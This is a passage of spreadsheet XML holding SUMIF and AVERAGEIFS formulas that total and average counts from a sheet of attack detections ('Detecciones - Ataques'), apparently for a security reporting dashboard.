        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GO45" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="GP45" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GQ45" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GR45" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GS45" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="GT45" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GU45" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GV45" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG45)</f>
        <v>0</v>
      </c>
      <c r="GW45" s="392"/>
      <c r="GX45" s="392"/>
      <c r="GY45" s="392"/>
      <c r="GZ45" s="392"/>
      <c r="HA45" s="392"/>
      <c r="HB45" s="392"/>
      <c r="HC45" s="392"/>
      <c r="HD45" s="392"/>
      <c r="HE45" s="392"/>
      <c r="HF45" s="392"/>
      <c r="HG45" s="392"/>
      <c r="HH45" s="392"/>
      <c r="HI45" s="392"/>
      <c r="HJ45" s="392"/>
      <c r="HK45" s="392"/>
      <c r="HL45" s="392"/>
      <c r="HM45" s="392"/>
      <c r="HN45" s="392"/>
      <c r="HO45" s="392"/>
      <c r="HP45" s="392"/>
    </row>
    <row r="46">
      <c r="B46" s="277"/>
      <c r="C46" s="271"/>
      <c r="D46" s="271"/>
      <c r="E46" s="271"/>
      <c r="F46" s="271"/>
      <c r="G46" s="278"/>
      <c r="J46" s="277"/>
      <c r="K46" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BC3:BC139)</f>
        <v>7946</v>
      </c>
      <c r="L46" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CO3:CO139)</f>
        <v>227498</v>
      </c>
      <c r="M46" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EE3:EE139)</f>
        <v>232820</v>
      </c>
      <c r="N46" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FU3:FU139)</f>
        <v>565975</v>
      </c>
      <c r="O46" s="278"/>
      <c r="Q46" s="271"/>
      <c r="R46" s="386" t="s">
        <v>2491</v>
      </c>
      <c r="S46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1298</v>
      </c>
      <c r="T46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1253</v>
      </c>
      <c r="U46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>117</v>
      </c>
      <c r="V46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="W46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>14120</v>
      </c>
      <c r="Y46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="Z46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>22716</v>
      </c>
      <c r="AA46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>184</v>
      </c>
      <c r="AB46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>65</v>
      </c>
      <c r="AC46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>27</v>
      </c>
      <c r="AD46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>130</v>
      </c>
      <c r="AE46" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>9</v>
      </c>
      <c r="AF46" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>575</v>
      </c>
      <c r="AG46" s="271"/>
      <c r="AH46" s="386" t="s">
        <v>2491</v>
      </c>
      <c r="AI46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>1292</v>
      </c>
      <c r="AJ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>6</v>
      </c>
      <c r="AL46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1253</v>
      </c>
      <c r="AN46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>2</v>
      </c>
      <c r="AS46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>12</v>
      </c>
      <c r="AY46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>14116</v>
      </c>
      <c r="BD46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>9</v>
      </c>
      <c r="BL46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>19607</v>
      </c>
      <c r="BN46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>3108</v>
      </c>
      <c r="BO46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>11</v>
      </c>
      <c r="BR46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>5</v>
      </c>
      <c r="BT46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>30</v>
      </c>
      <c r="BZ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>2</v>
      </c>
      <c r="CI46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>22</v>
      </c>
      <c r="CJ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>6</v>
      </c>
      <c r="CL46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>23</v>
      </c>
      <c r="CN46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>5</v>
      </c>
      <c r="CP46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>20</v>
      </c>
      <c r="CQ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>2</v>
      </c>
      <c r="CR46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>123</v>
      </c>
      <c r="CT46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA46" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EM3:$EM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB46" s="355">
